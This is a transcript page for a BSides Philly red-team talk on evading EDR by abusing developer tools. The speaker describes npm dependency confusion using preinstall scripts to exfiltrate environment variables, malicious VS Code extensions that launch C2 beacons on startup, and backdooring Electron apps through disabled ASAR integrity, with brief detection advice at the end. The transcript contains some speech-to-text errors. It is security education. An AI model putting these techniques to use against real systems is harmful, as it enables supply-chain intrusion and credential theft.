← All talks

Hiding in Plain Sight - Weaponizing Developer Applications and Interpreted Languages to Evade EDR

BSides Philly · 202526:51160 viewsPublished 2026-02Watch on YouTube ↗
Speakers
Tags
About this talk
Demonstrates how trusted developer applications—IDE extensions, Electron apps, and interpreted language environments—can be weaponized to evade sophisticated EDR solutions. Covers hijacking VS Code extensions, npm package confusion attacks, and ASAR integrity flaws to establish persistent access and blend malicious activity with legitimate developer workflows.
Show original YouTube description
Presenter: Annika Clarke As endpoint detection and response (EDR) solutions evolve to counter traditional intrusion techniques, organizations often develop a false sense of security, relying heavily on these tools to detect and mitigate threats. This presentation challenges that perception by exposing how trusted developer tools, such as IDE extensions, Electron applications, and interpreted language execution environments can be weaponized to bypass the most sophisticated detection mechanisms. These inherent risks posed by trusted applications and developer environments are often critically overlooked. This talk will demonstrate how to exploit this blind trust through bypassing traditional endpoint controls and signature-based detection due to the use of high-level languages like NodeJS and Python to hijack legitimate applications. Attendees will gain insights into how these methods were developed and successfully deployed during real-world red team engagements.
Show transcript [en]

Awesome. >> Thank you. So again, my name is Anukica Clark. Um, and I'm here to talk about the malware that I developed for developer environments and interpreted languages and how they bypass modern day edrs. So quickly, just a little about me. I'm a red teamer, pentester, and offensive security engineer at Security Risk Advisors here in Philly. Um, and my main focus is on offensive technique development as well as tools. I do a lot of social engineering um and development for social engineering and then also the color pink which you're going to see all my code is pink all my terminals are pink so just a warning um so the motivation for this whole talk are red

teams so at SR we conduct long-term full scope red team engagements starting at the social engineering and OSENT phases all the way through advanced windows exploitation um and so within these assessments stealth is the primary goal uh we aim to bypass detection mechanisms that our clients have um and compromise their systems as quietly as possible. So that way we're providing them with a realworld adversarial uh uh basically test so we can better protect our clients. Um and the techniques that I'll be discussing in this talk are still currently being exploited in the wild which is really exciting. So within the current landscape we're seeing EDRs or endpoint detection response platforms becoming more and more advanced. Um they can correlate

behavior and processes. Uh they have sophisticated anomaly detection, advanced notification systems, so when an incident is happening, there's a lot of communication and synchronization. Uh and then there's also real-time monitoring. So we're actively fighting against these EDR platforms. Uh additionally, client environments in general are just becoming more and more secure. Um they're hardened against well-known tactics and techniques. Um and as well as for our clients that utilize our red teams and for ask for those types of assessments, they typically have a much more secure uh security much more mature security environment compared to um companies that are going into the security scope and might use pentests or more defensive uh assessments as well. Um and so these

clients that we have are very secure and strong. Um so they provide us a big challenge to bypass. Um, additionally, traditional techniques uh that we were using in previous red teams and pentests even are beginning to be phased out because they're highly signatured um and highly like easily to be detected um and make a lot of noise. So, we need to phase out these techniques and innovate as threat actors do in the industry. Um so all of these techniques again are still we're seeing in the even in the past month that they are being actively exploited. So why developer environments? Uh so it's in my opinion that hijacking developer environments is really the future of enterprise exploitation. Um,

and they're incredibly powerful because within these techniques and future techniques as well, they require no fishing, no user interaction and there's no direct attacker interaction with the environment needed as well. Um, because we utilize these build pipelines and developer um, uh, CI/CD pipelines as well. um they execute our malicious code automatically and often and there's not a whole lot that uh defenders can do against it because we are able to blend our traffic in with the authorized developer activity. Um so basically developers create anomalous traffic to the point where it's expected. They're constantly reading and writing files. They're executing code. They're compiling code. They're doing suspicious things all the time, but that's just in their job

description and in the expected role. Um, and so developer environments inherently generate a lot of this anomalous activity. Um, and so we're able to blend in within that activity. Additionally, we can hijack these trusted libraries and applications. Um, there's this blind trust within how we view all of these developer applications. Um, such as VS Code is a blindly trusted application and we'll discuss how we're actually able to hijack that. Um, and so additionally, they have open-ended developer roles and permissions, which I kind of already touched on, where someone that is in a developer has to have a wide range of access and highly permissioned accounts compared to someone like in HR or sales where they have much more locked down

applications and uh job processes. Um, so it makes uh controlling these developer accounts incredibly difficult. Uh, additionally, the false positives and alerting is really tedious because uh, companies don't really want to put strict constraints on developers because that can impact productivity pretty dramatically. Um, and so constantly pinging developers what they're doing and asking if it's them or legitimate uh, really would impact a workflow and usually they're creating the end product for the company in of itself. So here's the three topics I'll be discussing today. So the first one is dependency confusion. We'll get into the malicious VS code extensions as well as uh electron application back doororing. So dependency confusion is a really powerful attack. And first before I

describe the attack, I'm going to explain what most companies believe that their environments look like. Um so most companies believe if they're using an internal repository, all their packages are private, that this is what their workflow looks like. A developer needs to install a library. They ping the internal repository and the repository brings back that library. They're able to program with that logic. Now, this is what the company actually looks like if you have not configured anything by default. And what we're able to do is use npmjs.org basically as a direct channel to tunnel our malware into developer environments. Um and so basically by default uh npm before pulling from the internal repository it always checks externally

first. So to give you a scenario of how this works, imagine you're a company that again you're using node within your applications um constantly. You're constantly building and developing um and so you're you need a package and so everything's here. You think you're internal, but now imagine one day an attacker um enters your environment. They gain a foothold. they're able to enumerate around laterally move and they're able to find a um some code snippets or uh repos. And so what they do from there is they find the name and the package number. Um and what you do is you check if it's public and in this case there wasn't a public repository yet. So they create that repository,

make it one version higher, publish it to npmjs.org and you sit and you wait. And what's really cool about this is these developer pipelines run our code for us. We don't have to do any direct interaction within the system. And so you sit and you wait and within either a day, two days, a week, a month, whatever the library that you were able to hijack um whatever their build runtime is, you will be able to channel directly into their developer environment. Um and this is not a hypothetical situation. Um, this happened last summer where we were able to gain full production access to our client's environment. Like every single um, production key was able to be

exfiltrated through this method where we sat and we waited for our code to be run. Um, and what was actually kind of funny about this was because these build pipelines are a little bit unreliable. Um, in terms of if you're if you don't know the exact processes in systems, it can take a between a short time or a longer time. We actually didn't get these results until um about three or four weeks after the engagement ended. Um which was kind of funny, but um it just shows that this you can do so much damage with such little knowledge. All you need is the package name, the version, and if it's not public and your company's environment is not tailored um

to accommodate the npm's vulnerable logic, um then you can be vulnerable and malware can just be channeled into your uh network or your um environment without your knowledge. Um and so again, this hijacks the npm default behavior. um it utilizes the vulnerable update logic whereas as long as it's one version higher it can even be a minor version um it will pull that package regardless. Uh so this is a really useful technique for initial access. Sometimes these libraries are exposed publicly and you're able to um hijack that externally. Um you can use it for persistence where every single time that build pipeline is ran uh it will spawn a beacon and additionally uh you can

exfiltrate data like we did in this example. Uh just for context, this is what an npm uh library looks like. You know, it has a readme code dependencies and like just houses the code. Now, the most important thing within this library structure, it's most baseline. You need a package.json and an index.js. Um the most important things here are the pre-install script and then the dependencies. Um when you look at this, the pre-install script is what triggers the actual logic within the applica or sorry, within the library. Um, and as you can see, um, there was a lot more logic that we had to build into this specific, uh, exploit within the red team. Uh, but at its most bare bones,

the commands we were running on these developer machines were just extracting the environment variables. Um, and so if this was to be done on, you know, a sales or HR person um, within PowerShell, obviously this would trigger some major alerts, but developers need to do that all the time. And these build pipelines, that's how they work. They're set in the environment variables. So it's kind it's expected behavior which makes this so powerful. Um additionally these dev dependencies versus dependencies um this is where you will land in the environment dependencies are ran whether it's in the developer mode or production. Um and so if we don't actually have access to the code base because we're just we found the library

name and version then if we don't have that logic within the node re uh repository that we're publishing we can break production systems. And so, uh, the dev dependencies, it can be even more dangerous because it's only run in development. There's not going to be as obvious of breakage and you can probably live on their system for longer. So, quickly, this is a really interesting technique as well, uh, where you're able to instead of, as you can see in this previous version, you name your package name and the version just like a number. Uh, but you can also put in a URL. And so if you control that URL, um it doesn't show up as any

dependencies. And this is really bad because it kind of uh lowers the guard and scanning um and makes uh companies maybe think that they don't have these dependencies and they're not vulnerable to this style of an attack. So to compare this dependency confusion versus EDRs, uh external requests from npmjs.org or is completely expected because again you might have external repositories that you're utilizing um like very common ones that are in all node projects. Um we offiscated the code within the npmjs.org uh when we uploaded our malware to that. Um and that's also expected relatively um because you know there's many legitimate reasons why a developer would upload um offiscated code or minified JavaScript or whatever. Um,

additionally, the pre-install script and the JavaScript execution. Um, seeing that being run on a system is literally how Node works. If there's no pre-install or execution, um, then there's no libraries, there's no functionality. So, these need to be ran. And so, detecting this off of that would be incredibly ineffective. Okay. So, I want to scan the audience really quickly. So, who here uses VS Code? Okay, awesome. Um, and who here has audited every single VS Code extension? Like you know exactly what it does. One. Okay, maybe one person. Um, so I always say like I I built this malicious extension and I don't check. Like I who knows what's on on my VS Code in terms

of extensions and auditing and knowing exactly what they do, but here's why you should care. Um, so basically we were able to upload this malicious VS Code extension which while I talk I want you guys to look at this list and sort of like think which one do you think is the one that's malicious? The one that I built. Um, and so what we were able to do was we dropped it on our victim's developer disc and we were able to spawn a beacon. So every single time that VS Code was open and was running um, we had persistent access to their machine. Um, so any guesses, any numbers that stand out to you? >> Number seven.

>> Seven. Okay. Anyone else? Okay. So, it actually is number seven. I don't know how you got that, but um there's a bunch of if you look um here compared to everything else, you know, it's all relatively blends in. And then here, every this one and if you look, it all just blends in. And this is just in your home directory which is what makes this so dangerous is we were able to just drop this functionality on their home home dur um and so again this is the the malicious one. Uh this is the general structure and so it's important because we were dropping this on disk and that means that we bypassed the Microsoft store. So all of

the configurations on here are strictly cosmetic. There was no verification. Um and it's actually just a package.json file that you fill in. Um, and I copied all of this just from like an existing readme. Um, change log the categories. The one thing I did want to point out is this Vssix thing will show up if it was a application that was dropped to disk. Uh, but again, there's legitimate reasons why a developer would have something um that they had customtailored to have on their disk. So that inherently does not raise like blatant red flags. Um, again, this is very similar to the node. Um, you need a package.json and extension.js. JS and the most important things on this

code are the activation events and then this main function. Um this main is what calls the extension.js. Um and these function uh yeah the functions of this um have like a bit more nuance but at its most bare again is that we were just running a C2 payload. Um and so what we are able to do is if you understand the structure and how these applications work um at their most basic level as well as their most complex level, you're able to um hijack them and again you're hiding in that um developer environment. The activation events are important because this is what triggers your VS Code extension to run. Uh we specifically uh wanted it to run on

startup which is what this asterisk means. So anytime that VS Code is up and running um then we'll have persistent access to their machine. Uh now looking at this uh compared to um other techniques um again we're able to bypass the Microsoft store. There's a variety of uh extension triggers. So depending on how you want to tailor your environment um or sorry tailor your tooling to your client environment. Um you can trigger on debugging. You can trigger on specific languages. So there's a lot of customization. Uh there's also a legitimate developer need to have these extensions, right? that you need Python installed. If whatever you're developing in, there's need for extensions for the application to work

properly with the code that you're building. Um, and again, process specifics are hidden by VS Code. They're under an extension host uh value and there's not like any um major outline processes with these extensions running. So again, versus EDRs, um the local disc activity is expected. We're dropping these to their home. developers are constantly dragging and dropping as well as these files and the extensions are constantly being updated as they're being ran. So activity within that directory is not unexpected and it's actually expected. Um so and then again extension code execution they're constantly running code like that's just how they exist. So that's also expected. Um and then additionally with our when our um implant was pinging out for

network activity this is also expected. there's if they're running any sort of code pipeline, there's going to be some form of network activity. If they're running importing libraries, there's going to be externally reaching out. Um, so there all of this is expected activity and that's how we were able to bypass EDRs. So moving into electron applications um, and talking about that blind trust that we have in VS Code and npmjs.org, we also have that in these electron applications. And to give an example what an Electron application is, it's Teams, Slack, Obsidian, um all of these really big platforms that are inherently trusted are on the company portals wherever you work. Um they tend to be

just readily available and trusted. Um and so they these are uh Chromium based applications. So like think web browser, but mo majority of them are not shipped with a sandbox by default. Um, and so they allow custom API access to the operating system, full read write file system access. Um, a lot of them are shipped with a NodeJS runtime. Um, as well as like full full network access. So this sounds incredibly vulnerable. So like why why why does it do that? And the main three things are consistency. So they want it to be the same on Mac as it is on Windows as it is on Linux. They want it to be self-contained so that it

ships with every resource that is needed within that application. It's downloaded onto your environment. Um, and this ties into how it is independent of the host. Um, and so if um they don't like say someone has never coded before and they don't have node on their system um then they don't want the application to malfunction or say you have an outdated version. So this is all just so it ships in one package but we're able to hijack the trust that is exists within these applications. So this is a big issue is ASR integrity. So that stands for uh atom shell archive format. It's essentially just a um glorified uh like zip file and basically no encryption. Um and we were able to I

was able to this is for Obsidian specifically they call out um these two things are disabled. So enable embedded ASIR integrity and only load from ASIR. Um and so what the integrity means is that it does not validate the contents of this ASR file. And because it's not encrypted and it's all on the local disk, we are able to unpack it um or extract and we can add and inject our custom code and there's no validation on that. Um and then additionally the only load from a uh app a only load app from ASAR um allows us to um have it read from a non-ASR file. So we can just inject any arbitrary code and have it

read from those um directories as well. Um and so this is obviously incredibly dangerous because if there's no integrity sign then you can do anything that you want and inject that code. Um and so in general these applications search for this is all within um either local app data or um config depending on what OS you're using. Um, and so it it searches for this directory resources app.as. And what you can do is if you can delete it or run it from a different directory. Um, and if it's not there, then it defaults to this app.as or app resources app directory. Um, and you are able to then load whatever code you want in there. Um, and so

different applications have varying different levels of um, like as we see here, some of these would be enabled versus disabled. So this is not universal. Um but many applications are shipped with these insecure configurations. Um and what you can see here is we can inject code. Um so again I have a lot of these snippets that show like at its most basic form unoffiscated. Um what you're able to do is we spawn a beacon on the system um just by the application opening and running. Um so it kind of shows that all of these techniques are um sneaky and they just exist with the application running and its default behavior. So if you haven't configured anything beyond

what you are given and the default behavior then you know we're able to bypass that um and hide our traffic within it. Um and briefly this this is uh inspired by Loki C2. It's a really cool platform um on GitHub where they have a bunch of different uh back doors. So there's a bunch of smart people that were able to discover these vulnerable applications um and have contributed a lot and so it's a really interesting tool and was the inspiration for this. So moving into it versus edrs um they hijack the legitimate binaries. So with um the lacking the ASIR integrity and just in general uh the signature remains the same because we're editing these

user space um files and everything. Um and so there's this blind trust, you know, we trust Obsidian, we trust Teams, we trust all these applications and so there's um if there the signature remains intact, which I talk about later, um then there's not that same detection from an EDR standpoint. Um so yeah so in conclusion to wrap up developer environments and why these techniques are so valuable. Um so they provide a direct channel into some of the most sensitive assets that a company owns. Um and they don't require social engineering. There's no direct user or attacker interaction. Uh we sit and we wait. You develop and you build and you figure out these creative ways to mimic

threat actor innovation. um these security controls to fix these issues are incredibly difficult to implement because they utilize the inherent processes and behaviors of these applications. Um and so by blocking or banning certain things you might completely eliminate usability um and the ability for your developers to create a high quality product. Um, additionally, the volume of traffic uh that developers behavior again is inherently anomalous and so these processes and permissions are required of their role. Um, and so we are able to uh blend in with developer activity with our malicious activity and it becomes almost impossible to distinguish um or in other words we had in plain sight. Thank you. All

right. Very well done. Does anyone have questions for or should like to ask? >> Anybody going on? I perhaps this is out of like scope of um maybe you don't have a opinion on this but I wanted to ask you if you were hired as an advisor by a detection company you know you know crowd strike or whatever >> is there any signatures that you might suggest to them that would limit as much as possible the false positives Yeah. Um, so I would say definitely within like specifically like VS Code, um, having some form of like audit on those extensions or um, like organizationalwide um, rules or whatever on what can be installed or like having some sort of

approval process. Um, I definitely think maybe flagging things that are offiscated from the jump. um certain things like that that would indicate um some of that malicious activity. I think also from the Electron standpoint, ensuring that there's some sort of um signature on the ASIR uh files and all of that um and tracking more of that local disk behavior rather than inherently trusting the applications. Um, and because a lot of these actions don't impact the signature of how they run, um, I would say monitoring more of that user disk activity that is trusted within the developer realm, um, and trying to figure out like a more effective way to um, differentiate um, like those files being modified versus um, it

just being normal dis activity, if that makes any sense. with obuscation. Yeah, >> you mentioned obuscation and VS code extensions. Can you be a little bit more specific what you mean? >> Basically like we whenever we um created that the code that we dropped on the system all of our actual like logic was offuscated. Um so yeah, >> thank you. >> Yeah. No, of course. >> Anybody else any more questions? >> Hey, nice to talk. Thank you. >> Thank you. The um one question I had was you were saying that it's common place for VS code extensions to reach out to the internet and so >> you can get your beacon through there um with the exception of like random

domains that it's never seen before. So from a red team perspective, >> yeah, >> what type of C2 trap are you looking at to be able to script by the lines there? >> Yeah. Um, specifically we have some like like very advanced internal tooling that we utilize for um that C2 traffic. Um, and we were utilizing like mythic and things like that and we had like custom integrations. Um so the specific traffic I can't speak to accurately at this moment. Um but we um had some very advanced tooling that um other co-workers had created that we were able to harness within this application. Um so yeah >> we have time for one more quick question

if anybody has one >> and anybody. All right. >> Awesome. >> Okay. So thank you so much. >> Thank you guys.